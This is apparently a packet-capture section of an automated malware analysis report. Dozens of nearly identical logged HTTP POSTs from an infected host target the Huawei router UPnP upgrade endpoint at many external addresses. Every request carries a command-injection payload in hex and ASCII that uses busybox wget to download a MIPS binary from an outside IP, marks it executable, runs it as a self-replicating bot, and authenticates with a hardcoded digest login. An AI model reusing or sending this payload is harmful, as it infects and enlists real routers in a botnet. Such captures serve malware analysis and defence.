                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1064192.168.2.1334216157.13.11.1837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.502113104 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1065192.168.2.1350448104.151.109.2937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.502137899 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1066192.168.2.134892841.213.249.17937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.502499104 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1067192.168.2.1346566197.34.216.637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.502530098 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1068192.168.2.135383641.87.192.17437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.502551079 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1069192.168.2.133594441.18.5.937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.502588034 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1070192.168.2.1347332157.70.69.14037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.502619028 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1071192.168.2.1341246188.81.136.11037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.502644062 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1072192.168.2.1340334197.31.192.11837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.502667904 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1073192.168.2.1341862197.19.120.12137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.502692938 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 